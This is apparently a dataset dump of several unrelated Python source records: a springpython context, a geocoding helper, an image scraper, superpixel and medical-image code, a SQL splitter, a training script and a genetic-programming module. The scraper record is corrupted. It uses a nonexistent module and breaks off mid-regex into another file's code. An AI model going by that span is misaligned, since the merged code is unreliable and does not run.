self.objects.iteritems():\n if not isinstance(obj, ObjectPostProcessor):\n for post_processor in post_processors:\n self.objects[obj_name] = post_processor.post_process_after_initialization(obj, obj_name)\n \n def _apply(self, obj):\n if len([True for type_to_avoid in self.types_to_avoid if isinstance(obj, type_to_avoid)]) == 0: \n if hasattr(obj, \"after_properties_set\"):\n obj.after_properties_set()\n #if hasattr(obj, \"post_process_after_initialization\"):\n # obj.post_process_after_initialization(self)\n if hasattr(obj, \"set_app_context\"):\n obj.set_app_context(self)\n \n\nclass ObjectPostProcessor(object):\n def post_process_before_initialization(self, obj, obj_name):\n return obj\n def post_process_after_initialization(self, obj, obj_name):\n return obj\n\nclass ApplicationContextAware(object):\n def __init__(self):\n self.app_context = None\n \n def set_app_context(self, app_context):\n self.app_context = app_context\n\nclass ObjectNameAutoProxyCreator(ApplicationContextAware, ObjectPostProcessor):\n \"\"\"\n This object will iterate over a list of objects, and automatically apply\n a list of advisors to every callable method. This is useful when default advice\n needs to be applied widely with minimal configuration.\n \"\"\"\n def __init__(self, objectNames=[], interceptorNames=[]):\n super(ObjectNameAutoProxyCreator, self).__init__()\n self.objectNames = objectNames\n self.interceptorNames = interceptorNames\n\n","sub_path":"thirdpart/springpython-1.0.0.RELEASE/springpython/context/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"456024832","text":"import requests\nimport json\nfrom myproject.settings import GOOGLE_API_KEY\n\n# address = 'Khadakpada, Kalyan West, Maharashtra, India'\n#\n# address2 = 'IIT BOMBAY, Powai, Mumbai'\n#\n# address3 = 'Naupada, Thane, India'\n\n\ndef get_pincode(address):\n key = GOOGLE_API_KEY\n\n url = \"https://maps.googleapis.com/maps/api/geocode/json?address={}&key={}\".format(address, key)\n\n response = requests.get(url)\n\n#response.text converts it to string in json format\n#json.loads converts it to python dictionary\n response_dictionary = json.loads(response.text)\n\n if response_dictionary['status'] == 'OK':\n for address_component in response_dictionary['results'][0]['address_components']:\n if 'postal_code' in address_component['types']:\n return address_component['long_name']\n\n#print(get_pincode('Bldg. no. 16, Nebula Darshan, Khadakpada, Kalyan West, Maharashtra, India'))","sub_path":"accounts/Pincode.py","file_name":"Pincode.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"572307341","text":"# _*_ coding:utf-8 _*_\\\r\nimport requests#导入模块\r\nimport obsear\r\nurl = 'http://www.ycgwl.com/Mobile/index.aspx' #url统一资源定位符\r\n# def download_img(url):\r\nresponse = requests.get(url) #发送请求,下载数据\r\n# print response.text #输出网页源码\r\nhtml = response.text\r\n# # \r\nimg_url = obsear.findall(r'= 2:\n is_taken[col, row] = 1\n contours.append([col, row])\n for i in range(len(contours)):\n self.img[contours[i][0], contours[i][1]] = color\n\n def _get_patches(self):\n \"\"\"\n Get patches used in CNN\n :return: \n \"\"\"\n patches = []\n pad_width = self.expand_space\n pad_img = np.pad(self.img, ((pad_width, pad_width), (pad_width, pad_width), (0, 0)), 'symmetric')\n for i in range(self.num_of_centers):\n [center_y, center_x] = np.array(np.average(np.column_stack(np.where(\n self.clusters == i)\n ), axis=0)).astype(int)\n center_x += pad_width\n center_y += pad_width\n patch = pad_img[center_y-pad_width:center_y+pad_width, center_x-pad_width:center_x+pad_width]\n patches.append(patch)\n self.patches = np.array(patches)\n\n def _get_depth(self):\n \"\"\"\n Get average depth of each superpixels which used as CNN label\n \"\"\"\n depths = []\n for i in range(self.num_of_centers):\n idx = (self.clusters == i)\n avg_depth = np.average(self.input_depth[idx])\n depths.append(avg_depth)\n self.depth = np.reshape(depths, [self.num_of_centers, 1])\n\n def get_pixel_based_depth(self):\n \"\"\"\n Convert sp-based depth to pixel-based depth\n \"\"\"\n try:\n assert len(self.depth) > 0\n except AssertionError:\n print('depth empty')\n exit(1)\n depth_map = np.zeros([self.height, self.width])\n for i in range(len(self.depth)):\n idx = (self.clusters == i)\n d = self.depth[i]\n depth_map[idx] = d\n return depth_map\n\n def get_texture_map(self):\n def _threshold(c, pixels):\n out = []\n for p in pixels:\n out.append(1) if _vec_greater(p, c) else out.append(0)\n return out\n\n def _vec_greater(l1, l2):\n def norm(item): return np.sum(np.square(item))\n return True if norm(l1) >= norm(l2) else False\n\n def _get_pixel_else_0(l, idy, idx):\n try:\n return l[idy][idx]\n except IndexError:\n return np.array([0.0, 0.0, 0.0])\n texture_map = np.zeros(self.img.shape)\n direction = [[-1, -1], [-1, 0], [-1, 1], [0, 1], [1, 1], [1, 0], [1, -1], [0, -1]]\n for y in range(self.height):\n for x in range(self.width):\n center = self.img[y, x]\n surround = []\n for d in direction:\n surround.append(_get_pixel_else_0(self.img, y+d[0], x+d[1]))\n values = _threshold(center, surround)\n weights = [1, 2, 4, 8, 16, 32, 64, 128]\n res = 0\n # 2 to 10\n for v in range(len(values)):\n res += weights[v] * values[v]\n texture_map[y, x] = res\n return texture_map\n\n def _get_cluster_pixels(self):\n \"\"\"\n Get superpixels \n \"\"\"\n self.superpixels.clusters = self.clusters\n # texture_map = self.get_texture_map()\n texture_map = lbp(ski_color.rgb2gray(self.img), 8, 1)\n sp_list = []\n for i in range(self.num_of_centers):\n idx = self.clusters == i\n colors = self.img[idx]\n textures = texture_map[idx]\n sp = SuperPixel(colors, textures)\n sp_list.append(sp)\n self.superpixels.sp_list = sp_list\n\n\nif __name__ == '__main__':\n print('test')\n","sub_path":"data_process/superpixel_process.py","file_name":"superpixel_process.py","file_ext":"py","file_size_in_byte":11315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"420170635","text":"import matplotlib\nimport matplotlib.pyplot as plt\n\nimport os\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom configs.Config_chd import get_config\nfrom utilities.file_and_folder_operations import subfiles\n\ndef reshape_array(numpy_array, axis=1):\n image_shape = numpy_array.shape[1]\n channel = numpy_array.shape[0]\n if axis == 1:\n slice_img = numpy_array[:, 0, :, :].reshape(1, channel, image_shape, image_shape)\n slice_len = np.shape(numpy_array)[1]\n for k in range(1, slice_len):\n slice_array = numpy_array[:, k, :, :].reshape(1, channel, image_shape, image_shape)\n slice_img = np.concatenate((slice_img, slice_array))\n return slice_img\n elif axis == 2:\n slice_img = numpy_array[:, :, 0, :].reshape(1, channel, image_shape, image_shape)\n slice_len = np.shape(numpy_array)[2]\n for k in range(1, slice_len):\n slice_array = numpy_array[:, :, k, :].reshape(1, channel, image_shape, image_shape)\n slice_img = np.concatenate((slice_img, slice_array))\n return slice_img\n elif axis == 3:\n slice_img = numpy_array[:, :, :, 0].reshape(1, channel, image_shape, image_shape)\n slice_len = np.shape(numpy_array)[3]\n for k in range(1, slice_len):\n slice_array = numpy_array[:, :, :, k].reshape(1, channel, image_shape, image_shape)\n slice_img = np.concatenate((slice_img, slice_array))\n return slice_img\n\nif __name__ == '__main__':\n c = get_config()\n \"\"\" \n data_dir = c.data_dir\n image_num = '1016'\n scaled_image_dir = os.path.join(c.data_dir, 'scaled_to_16')\n scaled_image = os.path.join(c.data_dir, 'ct_1083_image.npy')\n\n train_image = np.load(scaled_image)\n label_image = np.load(scaled_image)[:, 1]\n\n max_value = label_image.max()\n plt.imshow(train_image[12], cmap='gray')\n plt.show()\n plt.imshow(val_image[12], cmap='gray')\n plt.show()\n \n pred_dir = os.path.join(c.base_dir, c.dataset_name\n + '_' + str(\n c.batch_size) + c.cross_vali_result_all_dir + '_20190425-213808')\n \n\n test_num = c.dataset_name + '_006'\n image_dir = os.path.join(pred_dir, 'results', 'pred_' + test_num + '.npy')\n\n\n # all_image = np.load(image_dir)[25]\n\n\n plt.figure(1)\n for i in range(np.shape(all_image)[0]):\n plt.subplot(1,3,i+1)\n plt.imshow(train_image[i], cmap='gray')\n if i == 0:\n plt.xlabel('original image')\n elif i == 1:\n plt.xlabel('label image')\n else:\n plt.xlabel('segmented image')\n\n if not os.path.exists(os.path.join(pred_dir, 'images')):\n os.makedirs(os.path.join(pred_dir, 'images'))\n\n plt.savefig(os.path.join(pred_dir, 'images') + '/_006_25.jpg')\n plt.show()\n \"\"\"\n n = 4\n k = 115\n scaled_16_files = subfiles(c.scaled_image_16_dir, suffix='.npy', join=False)\n pred_32_files = subfiles(c.stage_1_dir_32, suffix='64.npy', join=False)\n org_files = subfiles(c.data_dir, suffix='.npy', join=False)\n\n ############ original image and target ########################\n file = org_files[2]\n data = np.load(os.path.join(c.data_dir, file))\n data = reshape_array(data, axis=3)\n\n image = data[:, 0]\n target = data[:, 1]\n\n ############ down scale using interpolation ########################\n data = torch.tensor(data)\n data_256 = F.interpolate(data, scale_factor=1/16, mode='bilinear')\n image_256 = data_256[:, 0]\n target_256 = data_256[:, 1]\n \n plt.figure(1)\n plt.subplot(2, 2, 1)\n plt.title('image:%d, slice:%d, original image' % (n, k))\n plt.imshow(image[k], cmap='gray')\n plt.subplot(2, 2, 2)\n plt.title('image:%d, slice:%d, original target' % (n, k))\n plt.imshow(target[k], cmap='gray')\n plt.subplot(2, 2, 3)\n plt.title('image:%d, slice:%d, image scale by 0.5' % (n, k))\n plt.imshow(image_256[k], cmap='gray')\n plt.subplot(2, 2, 4)\n plt.title('image:%d, slice:%d, target scale by 0.5' % (n, k))\n plt.imshow(target_256[k], cmap='gray')\n plt.show()\n\n ############ down scale using max-pooling ########################\n file_64 = pred_32_files[n]\n pred_64 = np.load(os.path.join(c.stage_1_dir_32, file_64))[:, 0:8]\n target_64 = np.load(os.path.join(c.stage_1_dir_32, file_64))[:, 8:9]\n\n pred_64 = torch.tensor(pred_64).float()\n target_64 = torch.tensor(target_64).long()\n\n # 32*32 image and target\n data_32 = np.load(os.path.join(c.scaled_image_32_dir, 'ct_1010_image.npy'))\n image_32 = data_32[:, 0]\n target_32 = data_32[:, 1]\n\n soft_max = F.softmax(pred_64[k:k + 1], dim=1)\n cf_img = torch.max(soft_max, 1)[0].numpy()\n pred_img = torch.argmax(soft_max, dim=1)\n\n # plot target\n plt.figure(2)\n plt.subplot(2, 2, 1)\n plt.title('image:%d, slice:%d, confidence' % (n, k))\n plt.imshow(cf_img[0], cmap='gray')\n plt.subplot(2, 2, 2)\n plt.title('image:%d, slice:%d, target' % (n, k))\n plt.imshow(target_64[k][0], cmap='gray')\n plt.subplot(2, 2, 3)\n plt.title('image:%d, slice:%d, pred_image' % (n, k))\n plt.imshow(pred_img[0], cmap='gray')\n plt.show()\n\n plt.figure(3)\n plt.subplot(1, 2, 1)\n plt.title('image:%d, slice:%d, original image' % (n, k))\n plt.imshow(image_32[k], cmap='gray')\n plt.subplot(1, 2, 2)\n plt.title('image:%d, slice:%d, original target' % (n, k))\n plt.imshow(target_32[k], cmap='gray')\n plt.show()\n\n\n","sub_path":"plot_image.py","file_name":"plot_image.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"598699625","text":"# Fraser Isbester 2019\r\n\r\ndef parse_sql(filename) -> list:\r\n data = open(filename, 'r').readlines()\r\n stmts = []\r\n DELIMITER = ';'\r\n stmt = ''\r\n\r\n comment_flag = 0\r\n inquote_flag = 0\r\n\r\n for lineno, line in enumerate(data):\r\n\r\n quote_count = line.count(\"'\")\r\n del_count = line.count(DELIMITER)\r\n\r\n # Handle Comment Blocks\r\n if('/*' in line and '*/' not in line and comment_flag != 1):\r\n # print(\"Found Comment start:\", line)\r\n # input(\"\")\r\n comment_flag = 1\r\n continue\r\n if('*/' in line and '/*' not in line and comment_flag != 0):\r\n # print(\"Found Comment end\")\r\n # input(\"\")\r\n comment_flag = 0\r\n continue\r\n if(comment_flag == 1 or line.startswith('--')):\r\n # print(\"Skipping:\", line)\r\n # input(\"\")\r\n continue\r\n # Handle Delimer-in-quote problems\r\n if(quote_count > 0 and del_count > 0):\r\n stmt_buffer = ''\r\n for char in line:\r\n if(char == \"\\\\'\"):\r\n stmt_buffer += char\r\n elif(char == \"'\"):\r\n inquote_flag += 1\r\n if(char == DELIMITER):\r\n if(inquote_flag % 2 == 0):\r\n stmt_buffer += char\r\n stmt += stmt_buffer\r\n stmts.append(stmt.strip())\r\n stmt = ''\r\n continue\r\n elif(inquote_flag % 2 != 0):\r\n stmt_buffer += char\r\n else:\r\n print(\"Big error in del-in-quote proccessing\")\r\n quit()\r\n else:\r\n stmt_buffer += char\r\n stmt += stmt_buffer\r\n continue\r\n\r\n if not line.strip():\r\n continue\r\n\r\n if 'DELIMITER' in line:\r\n print('DELIMITER In line?')\r\n input(\"\")\r\n DELIMITER = line.split()[1]\r\n continue\r\n\r\n if (DELIMITER not in line):\r\n stmt += line.replace(DELIMITER, ';')\r\n continue\r\n\r\n if stmt:\r\n stmt += line\r\n stmts.append(stmt.strip())\r\n stmt = ''\r\n else:\r\n stmts.append(line.strip())\r\n\r\n return stmts\r\n","sub_path":"SQL Script Automation Code.py","file_name":"SQL Script Automation Code.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"335128119","text":"import torch\nimport torch.optim as optim\nimport torch.utils.data.dataset\nfrom torch.autograd import Variable\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nfrom PIL import Image\nimport scipy.misc\nfrom glob import glob\nfrom other.spatial_transforms import (Compose, Normalize, Scale, CenterCrop, ToTensor)\nfrom other.mean_vggs import get_mean\nfrom path_manager import PathManager\nfrom nets.net_poseemb import Net\n\n\n# set the distance files\ndistances_train_file = PathManager.path_distance_frame0_path_3d_train\ndistances_valtest_file = PathManager.path_distance_frame0_path_3d_valtest\n\n# set the train and val dataset files\ndataset_train_txt = PathManager.path_dataset_train_txt\ndataset_valtest_txt = PathManager.path_dataset_valtest_txt\n\n\nclass ThinSlicingTrainset(torch.utils.data.dataset.Dataset):\n def __init__(self, far_max=None):\n super(ThinSlicingTrainset, self).__init__()\n\n self.far_min = 31\n self.far_max = far_max\n\n self.image_root = PathManager.path_image_root\n\n print('- loading distances')\n distances_filename = distances_train_file\n distances = np.load(distances_filename)\n self.nearest_indices = np.argsort(distances, axis=1)\n self.nearest_indices[:, 0] = np.array(range(self.nearest_indices.shape[0]))\n\n with open(dataset_train_txt) as infile:\n image_list = [x.strip() for x in infile.readlines()]\n self.dataset = [[' '.join(x.strip().split(' ')[:-16]) + '/'] + x.strip().split(' ')[-16:] for x in image_list]\n\n def __getitem__(self, index):\n return self.load_batch(index)\n\n def __len__(self):\n return len(self.dataset)\n\n def load_batch(self, index):\n # print index\n\n shuffled = lambda seq, rnd=random.random: sorted(seq, key=lambda _: rnd())\n should_horizontally_flip = random.getrandbits(1)\n\n selection = [0] + shuffled(range(1, 31))[0:5] + shuffled(range(31, self.far_max))[0:105]\n\n spatial_transform = Compose([Scale(112),\n CenterCrop(112),\n ToTensor(),\n Normalize(get_mean(), [1, 1, 1])])\n\n near_indices = self.nearest_indices[index]\n\n image_crops_list = []\n prepped_tensors = []\n for idx, near_idx in enumerate(near_indices[selection]):\n image_name = self.image_root + self.dataset[near_idx][0] + self.dataset[near_idx][1].split('_')[1] + '.png'\n raw_imgs = scipy.misc.imread(image_name)[np.newaxis,:]\n\n r1, g1, b1 = [115, 108, 99]\n r2, g2, b2, = get_mean()\n red, green, blue = raw_imgs[:, :, :, 0], raw_imgs[:, :, :, 1], raw_imgs[:, :, :, 2]\n mask = (red == r1) & (green == g1) & (blue == b1)\n raw_imgs[:, :, :, :3][mask] = [r2, g2, b2]\n\n image_crops = self.augment(raw_imgs, do_flip=should_horizontally_flip)\n image_crops_list += [image_crops]\n\n prepped_images = [spatial_transform(Image.fromarray(image_crop)) for image_crop in image_crops][0]\n prepped_tensor = prepped_images\n\n prepped_tensors += [prepped_tensor]\n\n # labels = ['anchor', 'similar', 'similar', 'similar', 'similar', 'similar', 'different', 'different', 'different']\n # image_crops_list = image_crops_list[0:9]\n # for frame in [0]:\n # fig = plt.figure()\n # for axes_idx in range(1,10):\n # fig.add_subplot(3, 3, axes_idx)\n # plt.imshow(image_crops_list[axes_idx-1][frame])\n # plt.title(labels[axes_idx-1])\n # plt.axis('off')\n # plt.show()\n\n batch = torch.stack(prepped_tensors, 0)\n\n batch2 = torch.zeros(batch.size())\n batch2[:, 0] = batch[:, 2]\n batch2[:, 1] = batch[:, 1]\n batch2[:, 2] = batch[:, 0]\n\n return batch2\n\n def augment(self, raw_imgs, do_flip):\n image0 = raw_imgs[0]\n\n if do_flip:\n for raw_img_idx, raw_img in enumerate(raw_imgs):\n raw_imgs[raw_img_idx] = np.fliplr(raw_img)\n\n stacked_images = raw_imgs\n\n shuffled = lambda seq, rnd=random.random: sorted(seq, key=lambda _: rnd())\n\n image_crops = []\n\n xmin = 16\n ymin = 16\n xmax = xmin + 112\n ymax = ymin + 112\n\n size_img = image0.shape[0]\n\n s_ratio = 0.050\n t_ratio = 0.050\n\n smag_max = int(np.ceil(s_ratio * 112))\n tmag_max = int(np.ceil(t_ratio * 112))\n\n scale = shuffled(range(smag_max * 2))[0]\n\n smag_rand = scale - smag_max\n xmin = xmin - smag_rand\n xmax = xmax + smag_rand\n ymin = ymin - smag_rand\n ymax = ymax + smag_rand\n\n tmag_xmin = np.max([1 - xmin, -tmag_max])\n tmag_ymin = np.max([1 - ymin, -tmag_max])\n tmag_xmax = np.min([size_img - xmax, tmag_max])\n tmag_ymax = np.min([size_img - ymax, tmag_max])\n\n translate_x = shuffled(range(tmag_xmax - tmag_xmin))[0]\n translate_y = shuffled(range(tmag_ymax - tmag_ymin))[0]\n\n tmag_rand_x = range(tmag_xmin, tmag_xmax)[translate_x]\n tmag_rand_y = range(tmag_ymin, tmag_ymax)[translate_y]\n xmin = xmin + tmag_rand_x\n xmax = xmax + tmag_rand_x\n ymin = ymin + tmag_rand_y\n ymax = ymax + tmag_rand_y\n\n image_sliced = stacked_images[:, ymin:ymax, xmin:xmax, :]\n\n for image_slice in image_sliced:\n img_crop = cv2.resize(image_slice, (112, 112))\n image_crops += [img_crop]\n\n return image_crops\n\n\nclass ThinSlicingValset(torch.utils.data.dataset.Dataset):\n def __init__(self):\n print('Loading Thin-Motion Valset')\n super(ThinSlicingValset, self).__init__()\n\n self.image_root = PathManager.path_image_root\n\n print('- loading distances')\n distances_filename = distances_valtest_file\n distances = np.load(distances_filename)\n distances = distances[:1919, :1919]\n\n self.nearest_indices = np.argsort(distances, axis=1)\n self.nearest_indices[:, 0] = np.array(range(self.nearest_indices.shape[0]))\n\n with open(dataset_valtest_txt) as infile:\n image_list = [x.strip() for x in infile.readlines()]\n self.dataset = [[' '.join(x.strip().split(' ')[:-16]) + '/'] + x.strip().split(' ')[-16:] for x in image_list]\n self.dataset = self.dataset[:1919]\n\n def __getitem__(self, index):\n return self.load_batch(index)\n\n def __len__(self):\n return self.nearest_indices.shape[0]\n\n def load_batch(self, index):\n # print index\n\n shuffled = lambda seq, rnd=random.random: sorted(seq, key=lambda _: rnd())\n\n selection = [0] + shuffled(range(1, 31))[0:5] + shuffled(range(31, self.nearest_indices.shape[1]))[0:105]\n\n spatial_transform = Compose([Scale(112),\n CenterCrop(112),\n ToTensor(),\n Normalize(get_mean(), [1, 1, 1])])\n\n near_indices = self.nearest_indices[index]\n\n image_crops_list = []\n prepped_tensors = []\n for idx, near_idx in enumerate(near_indices[selection]):\n image_name = self.image_root + self.dataset[near_idx][0] + self.dataset[near_idx][1].split('_')[1] + '.png'\n raw_imgs = scipy.misc.imread(image_name)[np.newaxis,:]\n\n r1, g1, b1 = [115, 108, 99]\n r2, g2, b2, = get_mean()\n red, green, blue = raw_imgs[:, :, :, 0], raw_imgs[:, :, :, 1], raw_imgs[:, :, :, 2]\n mask = (red == r1) & (green == g1) & (blue == b1)\n raw_imgs[:, :, :, :3][mask] = [r2, g2, b2]\n\n image_crops = self.augment(raw_imgs)\n image_crops_list += [image_crops]\n\n prepped_images = [spatial_transform(Image.fromarray(image_crop)) for image_crop in image_crops][0]\n prepped_tensor = prepped_images\n\n prepped_tensors += [prepped_tensor]\n\n # labels = ['anchor', 'similar', 'similar', 'similar', 'similar', 'similar', 'different', 'different', 'different']\n # image_crops_list = image_crops_list[0:9]\n # for frame in [0]:\n # fig = plt.figure()\n # for axes_idx in range(1,10):\n # fig.add_subplot(3, 3, axes_idx)\n # plt.imshow(image_crops_list[axes_idx-1][frame])\n # plt.title(labels[axes_idx-1])\n # plt.axis('off')\n # plt.show()\n\n batch = torch.stack(prepped_tensors, 0)\n\n batch2 = torch.zeros(batch.size())\n batch2[:, 0] = batch[:, 2]\n batch2[:, 1] = batch[:, 1]\n batch2[:, 2] = batch[:, 0]\n\n return batch2\n\n def augment(self, raw_imgs):\n image0 = raw_imgs[0]\n\n stacked_images = raw_imgs\n\n image_crops = []\n\n xmin = 16\n ymin = 16\n xmax = xmin + 112\n ymax = ymin + 112\n\n size_img = image0.shape[0]\n\n s_ratio = 0.050\n t_ratio = 0.050\n\n smag_max = int(np.ceil(s_ratio * 112))\n tmag_max = int(np.ceil(t_ratio * 112))\n\n smag_rand = range(smag_max * 2)[6] - smag_max\n xmin = xmin - smag_rand\n xmax = xmax + smag_rand\n ymin = ymin - smag_rand\n ymax = ymax + smag_rand\n\n tmag_xmin = np.max([1 - xmin, -tmag_max])\n tmag_ymin = np.max([1 - ymin, -tmag_max])\n tmag_xmax = np.min([size_img - xmax, tmag_max])\n tmag_ymax = np.min([size_img - ymax, tmag_max])\n tmag_rand_x = range(tmag_xmin, tmag_xmax)[range(tmag_xmax - tmag_xmin)[6]]\n tmag_rand_y = range(tmag_ymin, tmag_ymax)[range(tmag_ymax - tmag_ymin)[6]]\n xmin = xmin + tmag_rand_x\n xmax = xmax + tmag_rand_x\n ymin = ymin + tmag_rand_y\n ymax = ymax + tmag_rand_y\n\n image_sliced = stacked_images[:, ymin:ymax, xmin:xmax, :]\n\n for image_slice in image_sliced:\n img_crop = cv2.resize(image_slice, (112, 112))\n image_crops += [img_crop]\n\n return image_crops\n\n\ndef draw_plot(train_losses, val_losses, iter_display):\n x = np.array(range(0, len(train_losses))) * iter_display\n\n plt.ylim([0, 0.25])\n\n plt.plot(x, train_losses, label=\"trn\")\n plt.plot(x, val_losses, label=\"val\")\n plt.legend()\n global base_lr\n plt.savefig(results_path + 'loss.png')\n plt.close()\n\n\ndef train(epoch):\n global train_losses\n global val_losses\n\n val_iters = 500\n\n train_loss_mean = []\n for batch_idx, data in enumerate(train_loader):\n model.train()\n\n data = data[0].cuda()\n\n optimizer.zero_grad()\n (loss, l2_norm) = model(Variable(data))\n loss.backward()\n optimizer.step()\n\n train_loss_mean += [float(loss.data)]\n\n if batch_idx % val_iters == 0:\n print('epoch ' + str(epoch) + ', batch ' + str(batch_idx) + ': ' + str(float(loss.data)))\n train_losses += [np.mean(train_loss_mean)]\n val_losses += [val(5)]\n draw_plot(train_losses, val_losses, iter_display=val_iters)\n train_loss_mean = []\n\n torch.save(model.state_dict(), results_path + 'model_' + str(epoch) + '.pth')\n\n\ndef val(val_iterations=1):\n model.eval()\n\n loss_mean = 0\n\n for batch_idx, data in enumerate(val_loader):\n if batch_idx == val_iterations:\n break\n\n data = data[0].cuda()\n (loss, l2_norm) = model(Variable(data))\n loss_mean += float(loss.data) / float(val_iterations)\n\n return loss_mean\n\n\nif __name__ == '__main__':\n base_lr = 0.01\n\n train_losses = []\n val_losses = []\n results_path = 'results/'\n\n start_epoch = np.max([int(weights.split('_')[-1].split('.pth')[0])+1 for weights in glob(results_path+'model_*.pth')] + [0])\n\n model = Net()\n if start_epoch > 0:\n print('Resuming from model_'+str(start_epoch-1)+'.pth')\n model.load_state_dict(torch.load(results_path+'model_'+str(start_epoch-1)+'.pth'))\n else:\n raw_state_dict = model.state_dict()\n state_dict = torch.load(PathManager.path_vggs_conv_weights) # vgg convs, random fcs\n state_dict['conv1.weight'] = state_dict.pop('0.weight')\n state_dict['conv1.bias'] = state_dict.pop('0.bias')\n state_dict['conv2.weight'] = state_dict.pop('4.weight')\n state_dict['conv2.bias'] = state_dict.pop('4.bias')\n state_dict['conv3.weight'] = state_dict.pop('7.weight')\n state_dict['conv3.bias'] = state_dict.pop('7.bias')\n state_dict['conv4.weight'] = state_dict.pop('9.weight')\n state_dict['conv4.bias'] = state_dict.pop('9.bias')\n state_dict['conv5.weight'] = state_dict.pop('11.weight')\n state_dict['conv5.bias'] = state_dict.pop('11.bias')\n state_dict.pop('15.1.weight')\n state_dict.pop('15.1.bias')\n state_dict.pop('18.1.weight')\n state_dict.pop('18.1.bias')\n raw_state_dict.update(state_dict)\n model.load_state_dict(raw_state_dict)\n model = model.cuda()\n\n # val_dataset = ThinSlicingValset()\n # val_loader = torch.utils.data.DataLoader(val_dataset, num_workers=0, shuffle=True, batch_size=1)\n # for batch_idx, data in enumerate(val_loader):\n # x = 5\n # dataset_trn = ThinSlicingTrainset(far_max=len(ThinSlicingTrainset()))\n # train_loader = torch.utils.data.DataLoader(dataset_trn, num_workers=0, shuffle=True, batch_size=1)\n # for batch_idx, data in enumerate(train_loader):\n # x = 5\n\n for epoch in range(start_epoch, 7):\n anneal_factor = 0.2**epoch\n\n optimizer = optim.SGD([\n {'params': model.conv1.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.conv2.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.conv3.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.conv4.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.conv5.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.fc6.parameters(), 'lr': base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.fc7.parameters(), 'lr': base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n ])\n\n far_min = 31\n far_max = len(ThinSlicingTrainset()) - epoch * 3000\n if far_max < far_min + 1000:\n far_max = far_min + 1000\n\n dataset_trn = ThinSlicingTrainset(far_max=far_max)\n train_loader = torch.utils.data.DataLoader(dataset_trn, num_workers=1, shuffle=True, batch_size=1)\n dataset_val = ThinSlicingValset()\n val_loader = torch.utils.data.DataLoader(dataset_val, num_workers=0, shuffle=True, batch_size=1)\n\n train(epoch)\n\n print('Training complete')","sub_path":"experiments/image/3d/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"274010768","text":"#!/usr/bin/env python\nfrom __future__ import division\nimport sys\n\ndef lastWord(S):\n\tif len(S)==1:\n\t\treturn S\n\telse:\n\t\toptimal = lastWord(S[:-1])\n\t\tif S[-1]>=optimal[0]:\n\t\t\treturn S[-1]+optimal\n\t\telse:\n\t\t\treturn optimal+S[-1]\n\n#####################\n#########Main########\n#####################\n\nline = lambda : sys.stdin.readline().strip(\"\\n\")\n\ndef main():\n\n\t#Number of test cases\n\tntest = int(line())\n\n\t#Cycle over test cases\n\tfor t in range(ntest):\n\t\t\n\t\t#Read S\n\t\tS = line()\n\n\t\t#Calculate answer and output\n\t\tsys.stdout.write(\"Case #{0}: {1}\\n\".format(t+1,lastWord(S)))\n\nif __name__==\"__main__\":\n\tmain()","sub_path":"solutions_5631989306621952_0/Python/apetri/code-A.py","file_name":"code-A.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"318300977","text":"# _*_ coding: utf_8 _*_\r\n\r\n\"\"\"\r\nThe :mod:`gp` module defines the genetic programming capabilities of pyshgp.\r\nThe functions in this module are responsible for creating populations,\r\nevaluating individuals, and defining the core evolutionary loop that will be \r\nused to drive evolution.\r\n\r\n.. todo::\r\n Create more general abstraction of evolution, probably in the form of a \r\n class. Include extentions for scikit-learn.\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import, division, print_function, unicode_literals\r\n\r\nimport sys\r\nimport datetime\r\n\r\nfrom .. import utils as u\r\nfrom .. import exceptions as e\r\nfrom .. import constants as c\r\nfrom ..push import random as r\r\nfrom ..push import simplification as simp\r\nfrom ..push import instruction as instr\r\n\r\nfrom ..push.instructions import registered_instructions as ri\r\nfrom ..push.instructions import *\r\n\r\nfrom . import individual\r\nfrom . import operators as go\r\nfrom . import monitors as monitor\r\nfrom . import reporting\r\nfrom . import params\r\n\r\ndef normalize_genetic_operator_probabilities(gen_op_dict):\r\n \"\"\"Normalizes dict of operator probabilities so that values sum to 1.\r\n\r\n :param dict gen_op_dict: Dict where keys are operator names and values are probabilities. \r\n :returns: ``gen_op_dict`` where values sum to 1 and relative magnitude preserved.\r\n \"\"\"\r\n tot = sum(gen_op_dict.values())\r\n new_probs = [round(x / tot, 4) for x in gen_op_dict.values()]\r\n return dict(zip(gen_op_dict.keys(), new_probs))\r\n\r\n\r\ndef load_program_from_list(lst):\r\n \"\"\"Loads a program from a list, and checks each string in list for an instruction with the same name.\r\n\r\n .. warning::\r\n This function will attempt to look up all strings in the registered\r\n instructions to see if an instruction with a matching name exists. \r\n This limits you to only using strings that are not exact matches of\r\n instruction names. This is mitigated by the fact that all instruction\r\n names begin with a ``'_'``.\r\n\r\n :param list lst: List that should be translated into a Push 